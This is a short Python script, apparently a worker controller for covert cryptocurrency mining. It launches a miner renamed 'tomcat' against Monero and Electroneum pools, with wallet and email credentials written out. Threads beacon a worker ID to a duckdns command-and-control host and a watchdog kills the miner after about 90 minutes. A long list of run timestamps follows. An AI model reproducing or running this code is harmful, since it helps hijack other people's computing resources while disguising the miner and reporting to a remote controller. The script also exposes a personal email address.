import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:07.038434
#2018-02-17 17:32:03.956474
#2018-02-17 19:19:07.066222
#2018-02-17 21:08:04.110319
#2018-02-17 22:52:07.352911
#2018-02-18 00:37:01.344666
#2018-02-18 02:27:06.153266
#2018-02-18 04:16:03.529105
#2018-02-18 06:08:04.008840
#2018-02-18 07:58:06.728198
#2018-02-18 09:46:03.747914
#2018-02-18 11:32:02.300965
#2018-02-18 13:17:06.613573
#2018-02-18 15:07:03.912660
#2018-02-18 16:54:07.538081
#2018-02-18 18:43:07.385868
#2018-02-18 20:30:01.453230
#2018-02-18 22:16:04.928312
#2018-02-19 00:05:07.423995
#2018-02-19 01:51:07.555799
#2018-02-19 03:38:07.326865
#2018-02-19 05:23:04.702743
#2018-02-19 07:11:02.220528
#2018-02-19 08:59:05.625334
#2018-02-19 10:47:08.442664
#2018-02-19 12:36:01.320109
#2018-02-19 14:25:08.266894
#2018-02-19 16:15:01.409029
#2018-02-19 18:01:04.190201
#2018-02-19 19:49:08.365452
#2018-02-19 21:37:07.830770
#2018-02-19 23:25:01.648275
#2018-02-20 01:11:06.852621
#2018-02-20 03:01:04.653420
#2018-02-20 04:48:05.302367
#2018-02-20 06:32:06.602139
#2018-02-20 08:16:06.730845
#2018-02-20 10:02:03.878363
#2018-02-20 11:46:02.015936
#2018-02-20 13:34:07.793130
#2018-02-20 15:17:08.056217
#2018-02-20 17:04:05.934585
#2018-02-20 18:52:08.208176
#2018-02-20 20:42:04.471827
#2018-02-20 22:27:07.142700
#2018-02-21 00:07:05.371218
#2018-02-21 01:50:10.775431
#2018-02-21 03:38:02.019933
#2018-02-21 05:27:01.541355
#2018-02-21 07:14:07.686675
#2018-02-21 09:00:05.852234
#2018-02-21 10:48:07.648633
#2018-02-21 12:34:05.656396
#2018-02-21 14:22:08.956788
#2018-02-21 16:09:01.774626
#2018-02-21 18:00:13.099439
#2018-02-21 19:47:04.521494
#2018-02-21 21:35:05.502719
#2018-02-21 23:22:01.666535
#2018-02-22 01:11:04.518988
#2018-02-22 03:01:05.768602
#2018-02-22 04:46:07.001926
#2018-02-22 06:30:04.605555
#2018-02-22 08:17:01.865764
#2018-02-22 10:05:04.750236
#2018-02-22 11:51:02.091886
#2018-02-22 13:37:01.435272
#2018-02-22 15:27:08.150801
#2018-02-22 17:14:07.252965
#2018-02-22 19:01:08.698755
#2018-02-22 20:53:06.991362
#2018-02-22 22:39:09.027488
#2018-02-23 00:27:08.759320
#2018-02-23 02:14:01.910590
#2018-02-23 03:58:06.038599
#2018-02-23 05:45:06.225802
#2018-02-23 07:34:06.442787
#2018-02-23 09:37:06.596638
#2018-02-23 11:42:09.502734
#2018-02-23 13:32:08.044347
#2018-02-23 15:18:01.989692
#2018-02-23 17:05:07.253493
#2018-02-23 18:54:04.698457
#2018-02-23 20:40:08.787516
#2018-02-23 22:28:06.118136
#2018-02-24 00:14:06.379443
#2018-02-24 02:06:06.910153
#2018-02-24 03:56:01.762955
#2018-02-24 06:42:03.835692
#2018-02-24 08:31:03.831119
#2018-02-24 10:18:04.716283
#2018-02-24 12:13:07.430264
#2018-02-24 13:59:07.399996
#2018-02-24 15:51:04.599319
#2018-02-24 17:47:04.841145
#2018-02-24 19:34:05.487710
#2018-02-24 21:21:06.302325
#2018-02-24 23:59:06.825052
#2018-02-25 04:18:06.114617
#2018-02-25 07:48:07.993647